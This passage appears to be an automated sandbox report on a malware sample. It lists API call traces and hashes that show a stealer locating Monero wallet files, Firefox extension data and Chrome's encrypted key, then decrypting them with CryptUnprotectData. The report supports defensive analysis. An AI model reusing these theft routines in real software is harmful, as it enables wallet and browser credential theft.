                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: LibraryLoad
                            • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                            • API String ID: 1029625771-1545816527
                            • Opcode ID: 53e5270df896f26bbfdce47b688a85fff330cbe8faf7444e7c2cb67c8672b6ce
                            • Instruction ID: 0dd14e1e3af052d27053ebdb6f39cd0bf702c05b9d22a724b807839d9f485276
                            • Opcode Fuzzy Hash: 53e5270df896f26bbfdce47b688a85fff330cbe8faf7444e7c2cb67c8672b6ce
                            • Instruction Fuzzy Hash: ABF03078544204FFD722EB71F84CB153266F305725F005B14E58597186D3B4B888DB53
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00F496AE,00000000), ref: 00F48EEB
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F48EF2
                            • wsprintfW.USER32 ref: 00F48F08
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesswsprintf
                            • String ID: %hs
                            • API String ID: 769748085-2783943728
                            • Opcode ID: 62d46c6b60c9a69cbd7b0addf3339bd1ecad5dd28e3a064ca4fb820bcef785ba
                            • Instruction ID: a1d4a2793e491bd5e96ed34156f0627a102e637128966d2269af690127636921
                            • Opcode Fuzzy Hash: 62d46c6b60c9a69cbd7b0addf3339bd1ecad5dd28e3a064ca4fb820bcef785ba
                            • Instruction Fuzzy Hash: F0E0EC75A44309BFDB20DB94ED0EE6D77B8EB05702F000294FE4997381DA71AE109BA1
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                              • Part of subcall function 00F48CF0: GetSystemTime.KERNEL32(00F50E1B,00989BB8,00F505B6,?,?,00F313F9,?,0000001A,00F50E1B,00000000,?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F48D16
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F3AA11
                            • lstrlen.KERNEL32(00000000,00000000), ref: 00F3AB2F
                            • lstrlen.KERNEL32(00000000), ref: 00F3ADEC
                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                            • DeleteFileA.KERNEL32(00000000), ref: 00F3AE73
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 6f715b978fa0614f73c88dd74517967a845cbcdb6aa764aa8f07420d97bee621
                            • Instruction ID: 115fb40288a6ade84896ac0752692c3c2e32630112cbcb9211f97e43b5e89284
                            • Opcode Fuzzy Hash: 6f715b978fa0614f73c88dd74517967a845cbcdb6aa764aa8f07420d97bee621
                            • Instruction Fuzzy Hash: 3CE12C729505189BDB15FBA4DCA2EEE7739BF54300F008598F91672092EF386A4CDB72
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                              • Part of subcall function 00F48CF0: GetSystemTime.KERNEL32(00F50E1B,00989BB8,00F505B6,?,?,00F313F9,?,0000001A,00F50E1B,00000000,?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F48D16
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F3D581
                            • lstrlen.KERNEL32(00000000), ref: 00F3D798
                            • lstrlen.KERNEL32(00000000), ref: 00F3D7AC
                            • DeleteFileA.KERNEL32(00000000), ref: 00F3D82B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: a8a3c7a9bcd61818309e3581dc08b8e4dc5ad97de87f7447849201b1fbf18962
                            • Instruction ID: da06936b382727fa550393ed3b3f96796a4f836ede4a59536427952d7681df32
                            • Opcode Fuzzy Hash: a8a3c7a9bcd61818309e3581dc08b8e4dc5ad97de87f7447849201b1fbf18962
                            • Instruction Fuzzy Hash: 7A913072D505189BEB15FBA0DCA6EEE7739AF54304F404568F90672092EF387A08DB72
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                              • Part of subcall function 00F48CF0: GetSystemTime.KERNEL32(00F50E1B,00989BB8,00F505B6,?,?,00F313F9,?,0000001A,00F50E1B,00000000,?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F48D16
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F3D901
                            • lstrlen.KERNEL32(00000000), ref: 00F3DA9F
                            • lstrlen.KERNEL32(00000000), ref: 00F3DAB3
                            • DeleteFileA.KERNEL32(00000000), ref: 00F3DB32
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: d9287a5db0ffd07c8713004a78d3ded23213b9e2bb7e8238f2156e047b06caab
                            • Instruction ID: 8174934550a8083456499061432ca9cf950672cd343af764fbb680630c9a9f69
                            • Opcode Fuzzy Hash: d9287a5db0ffd07c8713004a78d3ded23213b9e2bb7e8238f2156e047b06caab
                            • Instruction Fuzzy Hash: 51813272D501189BDB15FBA4DCA6EEE7B39BF54304F404568F90662092EF386A08DB72
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AdjustPointer
                            • String ID:
                            • API String ID: 1740715915-0
                            • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                            • Instruction ID: 7bcca0863b000c7e3ab7b209d50aae52f0573b394d5cf4339c0f1d7bf9218876
                            • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                            • Instruction Fuzzy Hash: A251E4B2901206AFEB259F95C841BBA77A4FF42321F24423DF9058B591EB35ED44FB90
                            APIs
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00F3A664
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrcpy
                            • String ID: @$v10$v20
                            • API String ID: 2746078483-278772428
                            • Opcode ID: 02c61e376ba5f7c8e8f4e1823147207e68de07cc8c2836ac5d0b9aff341378bf
                            • Instruction ID: 291b04d417914add682830791816e8b8a4b964712ae1d82782974ff8c33a866d
                            • Opcode Fuzzy Hash: 02c61e376ba5f7c8e8f4e1823147207e68de07cc8c2836ac5d0b9aff341378bf
                            • Instruction Fuzzy Hash: CA514C75A50208EFEB28EFA4CD96BED7B75BF40344F008118ED0A5B291DB746A05EB52
                            APIs
                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                              • Part of subcall function 00F3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F3A13C
                              • Part of subcall function 00F3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F3A161
                              • Part of subcall function 00F3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00F3A181
                              • Part of subcall function 00F3A110: ReadFile.KERNEL32(000000FF,?,00000000,00F3148F,00000000), ref: 00F3A1AA
                              • Part of subcall function 00F3A110: LocalFree.KERNEL32(00F3148F), ref: 00F3A1E0
                              • Part of subcall function 00F3A110: CloseHandle.KERNEL32(000000FF), ref: 00F3A1EA
                              • Part of subcall function 00F48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F48FE2
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00F51678,00F50D93), ref: 00F3F64C
                            • lstrlen.KERNEL32(00000000), ref: 00F3F66B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 998311485-3310892237
                            • Opcode ID: 5dd644178b41730835127df0db5d4c10db61cf57942a45e54a760f4372306813
                            • Instruction ID: 27a25185d115cd265e3fb2b388cba8632e971a26bb5bb489e7ea58a132412342
                            • Opcode Fuzzy Hash: 5dd644178b41730835127df0db5d4c10db61cf57942a45e54a760f4372306813
                            • Instruction Fuzzy Hash: EA512F72D401089BDB04FBA4DDA2DED7B39AF94344F408568FD1667191EF386A0CEB62
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: 707c60e50afb45c0212315970b7aff16dd072ea0c2814c75f51bb1e6682324ac
                            • Instruction ID: 15a069daa981a9a96d11c9ab7d63c3fc6a3c18a367a505e0951ddd418d49972a
                            • Opcode Fuzzy Hash: 707c60e50afb45c0212315970b7aff16dd072ea0c2814c75f51bb1e6682324ac
                            • Instruction Fuzzy Hash: F2413F71D001099FEF04EFA4DC55AEEBB79EF54304F008118F91676281EB74AA05EFA2
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F3A13C
                              • Part of subcall function 00F3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F3A161
                              • Part of subcall function 00F3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00F3A181
                              • Part of subcall function 00F3A110: ReadFile.KERNEL32(000000FF,?,00000000,00F3148F,00000000), ref: 00F3A1AA
                              • Part of subcall function 00F3A110: LocalFree.KERNEL32(00F3148F), ref: 00F3A1E0
                              • Part of subcall function 00F3A110: CloseHandle.KERNEL32(000000FF), ref: 00F3A1EA
                              • Part of subcall function 00F48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F48FE2
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00F3A489
                              • Part of subcall function 00F3A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F34F3E,00000000,00000000), ref: 00F3A23F
                              • Part of subcall function 00F3A210: LocalAlloc.KERNEL32(00000040,?,?,?,00F34F3E,00000000,?), ref: 00F3A251
                              • Part of subcall function 00F3A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F34F3E,00000000,00000000), ref: 00F3A27A
                              • Part of subcall function 00F3A210: LocalFree.KERNEL32(?,?,?,?,00F34F3E,00000000,?), ref: 00F3A28F
                              • Part of subcall function 00F3A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00F3A2D4
                              • Part of subcall function 00F3A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00F3A2F3
                              • Part of subcall function 00F3A2B0: LocalFree.KERNEL32(?), ref: 00F3A323
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
